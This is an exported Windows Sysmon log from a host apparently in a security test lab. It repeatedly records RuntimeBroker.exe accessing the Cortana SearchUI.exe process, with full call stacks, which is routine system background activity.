12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000007596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
